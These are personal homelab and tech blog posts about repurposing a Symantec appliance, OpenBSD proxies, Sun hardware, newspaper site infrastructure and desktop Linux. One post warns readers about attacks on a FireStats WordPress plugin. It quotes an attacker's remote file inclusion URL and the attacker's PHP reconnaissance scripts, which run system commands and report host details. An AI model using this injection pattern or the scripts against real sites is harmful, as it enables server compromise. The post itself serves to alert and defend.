tech.sweetnam.eu

Way back towards the end of August I inherited some fairly half decent equipment. Among them were two Symantec  5420 Security Appliances. I took them despite not knowing what it was that I was going to do with them. After a while I simply forgot about them until I decided yesterday to do something.

As the licenses had expired they weren’t much use as a security appliance so first things first was to take the cover off and have a gander inside. As I suspected an €8,000 from Symantec would of course be made from the cheapest parts available. The motherboard was from a company I had never heard of in all my years called iWill. Any references on the web point to them no longer existing. The CPU is a 2Ghz Celeron and it had 512MB RAM and a 40GB Maxtor hard disk. Connectivity wise there are 6 10/100Mbit Intel ethernet ports, two USB and one RS-232 ports. Inside on a riser board is a PCI slot however fitting a normal PCI card such as a display adapter s out of the question as the IDE cable would block even the shortest ones and besides, VGA cards are not supported! In the second IDE slot is a 16MB SSD.

So what was I going to do to get a new OS up and running on it? I came across a forum post from a guy who managed to get pfsense (FreeBSD) installed on it but unfortunately his instructions were a bit lacking. Out of curiosity I hooked a console cable up to the RS-232 port and opened a terminal where I was quite pleased to be greeted by a login prompt. I logged in using the username admin with the password I got from the LED panel on the front and lo and behold I was in a root shell. I guessed that Symantec’s software probably ran on one of the BSD’s or Linux from experience with Nokia Checkpoint which ran NetBSD I think.

Anyway I guessed correctly, the 5420 was running RedHat Linux 7.1. From the console I was able to garner a bit more about the hardware. In addition to the basic stuff I mentioned earlier there is a Broadcom Cryptographic Accelerator CPU on board. But back to my immediate problem. How to get another OS on it. After pondering for a few moments I decided to try and see if taking the disk out and sticking it into a spare PC and setting it up from there would work. I dusted off my trusty Optiplex Gx1 circa 1999 and proceeded to install Ubuntu 9.10 on the disk.

Before I stuck the disk back in the 5420 I made sure that I could access a shell via console cable. Thankfully there is some excellent documentation on the Ubuntu help site and in no time I was able to access the Dell via console cable and have access to the Grub boot menu on boot up as well.

Back into the 5420 did the disk go, console cable hooked up, terminal open and time to power up. To my absolute delight there was the Grub boot menu. I hit enter and up it loaded. Perfect! Except for one thing. I had no network access. Half way through diagnosing this the whole thing just froze on me so I rebooted. Not long after rebooting it froze again. It was then I remembered that the guy who installed pfsense on his one mentioned problems with ACPI.

Unfortunately as it would freeze up so quickly I was unable to fix it from a terminal so I had no other choice but to take the disk out and shove it back into the Dell again. Ubuntu 9.10 has a lot of things moved about and the new version of Grub had me a bit confused for a while but finally I got ACPI disabled and everything is working perfectly.

Being headless they aren’t much good for anything other than possibly their original intention as a security appliance. However I decided to set up one of them as a dedicated monitoring server running ntop and Munin. For that it is absolutely perfect!

It’s been absolutely ages since I last wrote here and I had been meaning to do so for some time. Since my last entry I have been tinkering away with my setup as I do on a regular basis and plenty of things have changed here on the back end. I suppose I will begin with my my connection and move up the chain from there.

First up is a new router. I picked up a nice Cisco 837 for a very reasonable price. I had a bit of fiddling to get it up and running with eircom broadband but I got there in the end and I have documented the procedure over on my wiki.

Next up is my reverse proxy. It is still running on the same hardware but I decided to move from Linux over to OpenBSD. My primary reason for this is that I was getting sick and tired of Linux iptables. In addition I concluded that Squids performance wasn’t optimal either. A move to OpenBSD seems to have resolved both those issues for me. PF on BSD is very configurable and easy to understand as well. Needless to say I have documented my experiences with PF over on my wiki also.

I’ve also gotten my hands on some new hardware. Well new hardware to me that is. I picked up three Sun Netra T1 servers, a Dell PowerEdge 1750 and two Symantec 5420 Firewall appliances.

So far I have been busy setting up the three Netras. They don’t have CD-ROM drives or display adapters so I had to install them over the network which was a process that was actually relatively simple. However it was only simple in that I already have a couple of other Sun machines here one of which I was able to use as an install server. Of course I have this process documented on my wiki also.

I haven’t decided what I will use the Netras for yet. One of them seems to have CPU problems and has been cannabilised to increase the specs. of the other two. They have 500Mhz UltraSparc IIe CPUs so by todays standards are not at all that powerful but they do draw very little power, certainly less than a Pentium IV machine so I may set them up as file servers. Initially I was hoping to install OpenBSD on one of them to use as my reverse proxy but unfortunately an OpenBSD network install does not seem to be as straight forward as Solaris.

The Poweredge 1750 I had hoped to set up as a webserver running either IIS or Apache. Unfortunately it only has 512MB of RAM so until I get some more for it that rules out Server 2008. However it is incredibly loud and that rules out keeping it running in my computer room. I am currently planning on setting up a dedicated computer room as it were in another part of the house so check back here for update on that.

The vulnerability described below has been resolved in Firestats 1.6.2 which you can download from http://firestats.cc/wiki/Download

Disclaimer: I have nothing at all to do with the development of Firestats. I am merely an end user.

Over the last few hours I have been watching a major attempt at cracking both of my WordPress installations. A quick investigation tells me that the cracking attempts are looking for this vulnerability in Firestats.

At present there has been over 600 attempts from servers all over the globe which attempt to fetch the path to firestats-wordpress.php and exploit it using a script hosted elsewhere.

A sample from my logs looks like this:

http://tech.sweetnam.eu/tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://www.x-pronet.com/board/forum/fx29id.txt??

The scripts themselves seem to have two versions. The most common one like above has the following contents:

<?php /* Fx29ID */ echo(“FeeL”.”CoMz”); die(“FeeL”.”CoMz”); /* Fx29ID */ ?>

The other one contains the following:

<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf(“%d b”, $number); }
if($len >= 4 && $len <=6) {
return sprintf(“%0.2f Kb”, $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf(“%0.2f Mb”, $number/1024/1024); }
return sprintf(“%0.2f Gb”, $number/1024/1024/1024); }

echo “Osirys<br>”;
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo “0sirys was here and also is a fucking gay..<br>”;
echo “uname -a: $un<br>”;
echo “os: $os<br>”;
echo “id: $id1<br>”;
echo “free: $free<br>”;
echo “used: $used<br>”;
echo “total: $all<br>”;
exit;

All I can recommend at the moment is removing firestats from your WordPress installation. It seems to be the only way to be sure for the moment.

The Wall Street Journal has an article today that confirms that IBM is having discussions with Sun over a possible acquisition. This isn’t the first time that IBM have had discussions with Sun but given the current economic climate it might be a reall possibility this time around. Also it would potentially be an easy sell to current Sun shareholders who have seen their shares decline steadily in value over recent years.

What will this mean for the technology industry? Well both IBM and Sun overlap in quite a few areas so here are the ones I can think of off the top of my head:

• IBM PowerPC and Sun SPARC CPU’s
• IBM Lotus Symphony and Star/OpenOffice
• IBM DB2 and Sun’s MySQL
• IBM AIX and Sun Solaris
• IBM Storage and Sun Storage/StorageTek

The crown jewels of a take over would probably be Java and MySQL but IBM swallowing up Sun would create more than a few jitters for EMC who presently rule the storage market.

Of course with the potential acquisition of Sun by IBM it will inevitiably compared to the HP take over of Compaq. Bot HP and Compaq were in competition with each other in the enterprise computing market with HP’s PA-RISC based servers competing with Compaq’s Alpha’s (in turn acquired by Compaqs take over of DEC).They also had competing operating systems with HP’s HP-UX vs Compaq Tru64.

Of course it wasn’t long after that merger was completed when HP killed off Alpha and Tru64.

Would IBM kill off SPARC and Solaris? I would speculate that they might kill off SPARC but focus purely on Solaris for x86. It might make sense for IBM to keep Solaris on x86 as they currently don’t have an x86 version of AIX. This is all conjecture of course and as the talks are at an early stage the deal might fall through yet.

Time will tell.

Having being obsessed with computers and networks for many years I am always interested to find out the infrastructure behind some of the more popular sites out there. Quite often it is possible to glean bits of information here and there and occasionally an error may occur that offers a glimpse as to what is happening in the back end.

Today it is the turn of the Irish Independent. I got the error pictured here while browsing through their site. What is interesting about it is the domain name; externalcontent.independent.ie. As we can see it is an served by an Apache web server running on a Red Hat machine. However if you look at the error more closely it is a bit more telling.

The server in question (externalcontent.independent.ie) attempted to serve up an ad or content related to  loadzajobs.ie but was unable to contact the back end server. So this tells me that externalcontent.independent.ie is configured as a reverse proxy server and according to Netcraft is located in Ireland.

The primary domain; www.independent.ie, is hosted in the Netherlands and runs Apache Coyote, again according to Netcraft. Apache Coyote is a connector for Apache Tomcat. I find it curious that the main www site is located in the Netherlands but I suspect that it might have something to do with being connected to the Amsterdam Internet Exchange which is largest Internet Exchange in the world.

It does make me wonder why they chose AMS-IX given that here in Ireland we have INEX.

So what about the other national daily online newspapers?

The Irish Times is hosted on Linux and Apache and hosted in Dublin and The Irish Examiner is hosted on Windows Server 2003 and Microsoft IIS/6.

Although there are Irish editions of the Sun, The Star, The Daily Mail and The Mirror, none of them have specific Irish orientated sites but I will include them here nonetheless.

The Sun claims to be hosted on Linux and Apache however they use Akamai for content delivery so this could be inaccurate.

The Daily Star claims to be hosted on an unknown Unix and Apache and the Daily Mirror is hosted on RedHat Linux and Apache.

Finally the Daily Mail, like the Sun also uses Akamai for content delivery and claims to be running Linux and Apache.

It’s clear that Apache and Linux are the front runners.

My few regular readers will have noticed that I have changed my theme. The more I looked at the old one, the more gaudy it looked so in came this one. However while browsing through some plugins, I came across a rather brilliant one called WPtouch.

It detects if you are using an iPhone or iPod touch and makes it look more like an iPhone application. So no more squinting or pinching or squeezing to read as you can read in the screenshot.

Incidentially, if you have an iPhone and are wondering how to take a screenshot?

Well it is a simple matter of holding  the home button and then pressing the the power button.

Most people will buy a PC or a laptop based on a budget. At this present moment in time given the economy crashing down around us that is more true than ever. Typically the version of operating system pre-installed on a new machine rarely if ever figures in the purchasing decision. The end result is that most people will end up buying a laptop of the shelf of their local Tesco that is running Windows Vista Home Basic which as you may or may not know is a castrated version of Vista.

However with the upcoming Windows 7 Microsoft have listened to the criticism from customers that Vista was a stinking pile of excrement but they didn’t listen to the complaints about the many confusing versions available because they have just announced that Windows 7 will be shipping in six different editions.

As with Vista, the Ultimate edition will be the one everyone will want but few will get. You see after someone pays €500+ for a laptop they aren’t likely to shell out the same amount again to update their operating system to something vaguely functional.

If you include 32bit and 64bit versions then there becomes a total of 22 versions including those “Euro Specials” that don’t have Media Player installed.

Why do they insist on thinking that they know what is best for us? Just make a Home and Professional edition a la XP and everyone should be happy. The irony is that at the moment the Windows 7 beta is getting fantastic reviews but that is because everyone using the beta is using the Ultimate edition.

They are going to get some shock when the beta expires!

When I originally decided to host from home a few years back I had to do more than just decide to fire up a webserver and NAT from my router to it. Choosing an operating system and web server software and application server was another consideration. Did I want to run Linux? Solaris? Microsoft IIS? and did I want to go with PHP or ASP? What was I going to use as a CMS for my primary site and what blog software would suit my requirements?

Ultimately I decided on OpenBSD with Apache and PHP and Windows + IIS. Of course I knew that over time I would be constantly changing this and I needed a way to effictively manage the domains themselves and the sites and database dumps. Obviously I needed a control panel of some sorts and after a bit of investigation I settled on Virtualmin.

Virtualmin is created by the same people who created the excellent and utterly essential Webmin control panel and as such the Virtualmin module integrates nicely into Webmin. Oh, and it’s free!

Originally this site was hosted on Windows Server and IIS and powered by BlogEngine.NET but I found it a bit of a pain to handle two different types of blogging software so I migrated this blog over to WordPress and host it with my other sites. Over time my other server changed several times from OpenBSD to Ubuntu, then Solaris 10 running on a Sun Workstation, back to Ubuntu and currently onto the Debian machine where they currently reside. With Virtualmin moving platforms was a simple matter of restoring from the backups that I took from the machine that was to be replaced.

Of course with it now being relatively trivial to change servers I find myself experimenting a bit more and I’m currently fighting the urge to move everything over to a FreeBSD server but for the moment I’m successfully resisting that urge!

I’ve written before about how I use my reverse proxy to block various bad bots and crawlers. At this stage I am blocking so much stuff that it would be way to much to post here. So if you are interested here are two links for you. The first is a copy of my squid regex file I use as per my tutorial and the second is a list of IP address and IP block that I have blocked on the proxy using IP tables.

Blockedbots.txt
Blockedip.txt

I had a hard drive failure on my main workstation recently and after installing the new one I decided to partition it with Windows XP and Ubuntu 8.04. That was about six weeks ago and I have only booted into Windows once.

I would consider myself a pretty advanced Linux/Unix user. My first encounter with Linux was in 1995 with LinuxFT and not long after that with an early Slackware release. As the years have rolled by since then I have setup literally hundreds of Linux servers and scores of Solaris and HP-UX servers but Linux has never impressed me on the desktop.

Through one job I had eight years ago I had to use RedHat 6.1 as a desktop OS and I absolutely hated it. The look and feel was terrible. The early GTK widgets were hideous. Gnome was at version 1.4 and it was almost completely unusable. Around the same time I installed SuSE 6.0 on a spare PC at home and while it used KDE by default, it wasn’t much better. Installing fonts was a nightmare and the only decent browser available then was Netscape Navigator which used the Motif Widget set and was a nightmarisly ugly looking beast with which to browse the web.

How things have changed in eight years! A quick roll call of my computer room here at home comes up with the following:

1 HP 9000 running HP-UX
1 Reverse Proxy server running Ubuntu 6.06 LTS
1 Web Server running Debian Lenny 64bit
2 Sun Blade 2000 workstations running Solaris 10
1 Apple MacBook running OS X 10.5 Leopard
1 Dell Poweredge running Ubuntu 6.06 LTS
1 Main workstation running Ubuntu 8.04 LTS (Dual booting with Windows XP)
1 Firewall running Smoothwall Linux

And finally:

1 File server running Windows Server 2003.

I’m now down running just one single Windows machine from a maximum of about 8 over the years. And unlike before I don’t think I will be turning back. Most of the applications that I used on Windows were open source to begin with and naturally they have Linux versions. Firefox and Thunderbird being the most obvious two. WINE has matured to such an extent that when I’m no longer comfortable using The Gimp for certain tasks, Photoshop CS2 works under WINE like a charm.

However if there is a problem with Linux it is that there is probably too much choice. Particularly when it comes to your default desktop. I’ve finally decided on Gnome mainly because I couldn’t get Compiz working properly with XFCE. I had a look at KDE4 and I will probably have to wrte a seperate post about it. Suffice to say for the moment I don’t like the look of it one little bit.

So after six weeks I finally have my desktop looking the way I want it to. Gone is the Ubuntu Brown default theme replaced instead with one I liked from art.gnome.org . I’m still trying to find window decorations that I like but for the moment the default Ubuntu one is tolerable.

I still do think however that Linux is still no where even near ready for use as a mainstram desktop OS for the average user. But for the moment I’m finally impressed enough that I can eschew Windows at long last.